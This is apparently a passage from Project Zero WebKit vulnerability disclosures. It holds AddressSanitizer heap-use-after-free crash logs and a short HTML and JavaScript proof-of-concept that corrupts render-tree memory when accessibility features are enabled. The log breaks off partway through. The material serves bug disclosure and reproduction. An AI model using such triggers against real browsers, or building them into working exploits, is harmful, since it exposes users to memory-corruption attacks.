#24 0x114b01a15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)
#25 0x114e95510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)
#26 0x11429668e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e)
#27 0x114296170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170)
#28 0x114171041 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x863041)
#29 0x114180aaf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x872aaf)
#30 0x1140827af in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7747af)
#31 0x11407d103 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f103)
#32 0x1144229ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)
#33 0x11441fd0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)
#34 0x11409b493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)
#35 0x11460f5c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)
#36 0x11413a093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)
#37 0x1140f9386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
#38 0x113b88997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
#39 0x113b822aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
#40 0x116509c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
#41 0x1066932eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)
#42 0x106696689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)
#43 0x106695ba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)
#44 0x105f36683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)
#45 0x105ce03b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)
#46 0x105ce9888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)
#47 0x10d9dc3b3 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c033b3)
#48 0x10d9dcd41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)
#49 0x7fffd2f753c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)
#50 0x7fffd2f562cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)
#51 0x7fffd2f557c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)
#52 0x7fffd2f551c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)
#53 0x7fffd24b6ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)
#54 0x7fffd24b6cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)
#55 0x7fffd24b6b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)
#56 0x7fffd0a51e23 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)
#57 0x7fffd11cd85d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)
#58 0x7fffd0a467aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)
#59 0x7fffd0a111dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)
#60 0x7fffe89118c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)
#61 0x7fffe89102e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)
#62 0x105bee56c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)
#63 0x7fffe86b8234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)
0x6110000e2a88 is located 8 bytes inside of 208-byte region [0x6110000e2a80,0x6110000e2b50)
freed by thread T0 here:
#0 0x108bd9294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)
#1 0x10da23f30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)
#2 0x114660e6d in WebCore::HTMLInputElement::updateType() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd52e6d)
#3 0x114662265 in WebCore::HTMLInputElement::parseAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd54265)
#4 0x114226fe8 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x918fe8)
#5 0x114235231 in WebCore::Element::didModifyAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x927231)
#6 0x114226a83 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x918a83)
#7 0x11501b946 in WebCore::setJSHTMLInputElementTypeFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x170d946)
#8 0x115011fc7 in bool WebCore::BindingCaller<WebCore::JSHTMLInputElement>::setAttribute<&(WebCore::setJSHTMLInputElementTypeFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1703fc7)
#9 0x10c674bf8 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x89bbf8)
#10 0x10c674d27 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x89bd27)
#11 0x10d14e2a9 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x13752a9)
#12 0x10d32ffa1 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1556fa1)
#13 0x10d34cce3 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1573ce3)
#14 0x10d3502d8 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x15772d8)
#15 0x10d34991a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)
#16 0x10cfae757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)
#17 0x10cf303da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)
#18 0x10c5680f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)
#19 0x10c568362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)
#20 0x10c5686d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)
#21 0x114b01a15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)
#22 0x114e95510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)
#23 0x11429668e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e)
#24 0x114296170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170)
#25 0x11425dd77 in WebCore::EventContext::handleLocalEvents(WebCore::Event&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x94fd77)
#26 0x11425edbe in WebCore::dispatchEventInDOM(WebCore::Event&, WebCore::EventPath const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x950dbe)
#27 0x11425e733 in WebCore::EventDispatcher::dispatchEvent(WebCore::Node&, WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x950733)
#28 0x1146664bc in WebCore::HTMLInputElement::onSearch() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd584bc)
#29 0x11627979c in WebCore::SearchInputType::startSearchEventTimer() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x296b79c)
previously allocated by thread T0 here:
#0 0x108bd8d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)
#1 0x7fffe883a281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)
#2 0x10da2dae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)
#3 0x10da22c4d in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)
#4 0x10d9b8437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)
#5 0x10d9b7768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)
#6 0x114901b48 in WebCore::InputType::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xff3b48)
#7 0x114901759 in std::__1::unique_ptr<WebCore::InputType, std::__1::default_delete<WebCore::InputType> > WebCore::createInputType<WebCore::SearchInputType>(WebCore::HTMLInputElement&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xff3759)
#8 0x1148fc15c in WebCore::InputType::create(WebCore::HTMLInputElement&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfee15c)
#9 0x114660be3 in WebCore::HTMLInputElement::updateType() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd52be3)
#10 0x114662265 in WebCore::HTMLInputElement::parseAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd54265)
#11 0x114226fe8 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x918fe8)
#12 0x114235231 in WebCore::Element::didModifyAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x927231)
#13 0x114226a83 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x918a83)
#14 0x11501b946 in WebCore::setJSHTMLInputElementTypeFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x170d946)
#15 0x115011fc7 in bool WebCore::BindingCaller<WebCore::JSHTMLInputElement>::setAttribute<&(WebCore::setJSHTMLInputElementTypeFunction(JSC::ExecState&, WebCore::JSHTMLInputElement&, JSC::JSValue, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, long long, long long, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1703fc7)
#16 0x10c674bf8 in JSC::callCustomSetter(JSC::ExecState*, bool (*)(JSC::ExecState*, long long, long long), bool, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x89bbf8)
#17 0x10c674d27 in JSC::callCustomSetter(JSC::ExecState*, JSC::JSValue, bool, JSC::JSObject*, JSC::JSValue, JSC::JSValue) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x89bd27)
#18 0x10d14e2a9 in JSC::JSObject::putInlineSlow(JSC::ExecState*, JSC::PropertyName, JSC::JSValue, JSC::PutPropertySlot&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x13752a9)
#19 0x10d32ffa1 in llint_slow_path_put_by_id (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1556fa1)
#20 0x10d34cce3 in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1573ce3)
#21 0x10d35034a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)
#22 0x10d34991a in vmEntryToJavaScript (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)
#23 0x10cfae757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)
#24 0x10cf303da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)
#25 0x10c5680f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)
#26 0x10c568362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)
#27 0x10c5686d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)
#28 0x114b01a15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)
#29 0x114e95510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20a2da) in WebCore::InputType::element() const
Shadow bytes around the buggy address:
0x1c220001c500: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1c220001c510: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
0x1c220001c520: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
0x1c220001c530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1c220001c540: 00 00 00 fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x1c220001c550: fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c220001c560: fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa
0x1c220001c570: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
0x1c220001c580: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x1c220001c590: fd fd fd fa fa fa fa fa fa fa fa fa fa fa fa fa
0x1c220001c5a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc fc
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==29786==ABORTING
-->
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1246
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on ASan build of WebKit nightly.
Note that accessibility features need to be enabled in order to trigger this bug. On Safari on Mac this can be accomplished by opening the inspector (simply opening the inspector enables accessibility features). On WebKitGTK+ (and possibly other WebKit releases) accessibility features are enabled by default.
PoC:
=================================================================
-->
<style>
#link { text-transform: lowercase; }
link::first-letter { border-spacing: 1em; }
</style>
<script>
function go() {
dt.appendChild(link);
var s = link.style;
s.setProperty("display", "table-column-group");
s.setProperty("-webkit-appearance", "menulist-button");
}
function eventhandler() {
dir.setAttribute("aria-labeledby", "meta");
link.appendChild(table.rows[0]);
}
</script>
<body onload=go()>
<link id="link">
<meta id="meta">
<dir id="dir">
<table id="table">
<th>1</th>
<dt id="dt">
<iframe onload="eventhandler()"></iframe>
<!--
=================================================================
ASan log:
=================================================================
==30692==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000090ac8 at pc 0x00010841ba26 bp 0x7fff5ca8ea60 sp 0x7fff5ca8ea58
READ of size 4 at 0x608000090ac8 thread T0
==30692==WARNING: invalid path to external symbolizer!
==30692==WARNING: Failed to use and restart external symbolizer!
#0 0x10841ba25 in WebCore::RenderObject::RenderObjectBitfields::hasLayer() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6aa25)
#1 0x10a8983fe in WebCore::RenderElement::addChild(WebCore::RenderObject*, WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x24e73fe)
#2 0x10ab7d6ec in WebCore::createTextRenderer(WebCore::Text&, WebCore::RenderTreePosition&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc6ec)
#3 0x10ab7b057 in WebCore::RenderTreeUpdater::updateTextRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca057)
#4 0x10ab7abfa in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9bfa)
#5 0x10ab7a47b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)
#6 0x108b1f7e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)
#7 0x108b20287 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f287)
#8 0x108ec59ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)
#9 0x108ec2d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)
#10 0x108b3e493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)
#11 0x1090b25c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)
#12 0x108bdd093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)
#13 0x108b9c386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)
#14 0x10862b997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)
#15 0x1086252aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)
#16 0x10afacc41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)
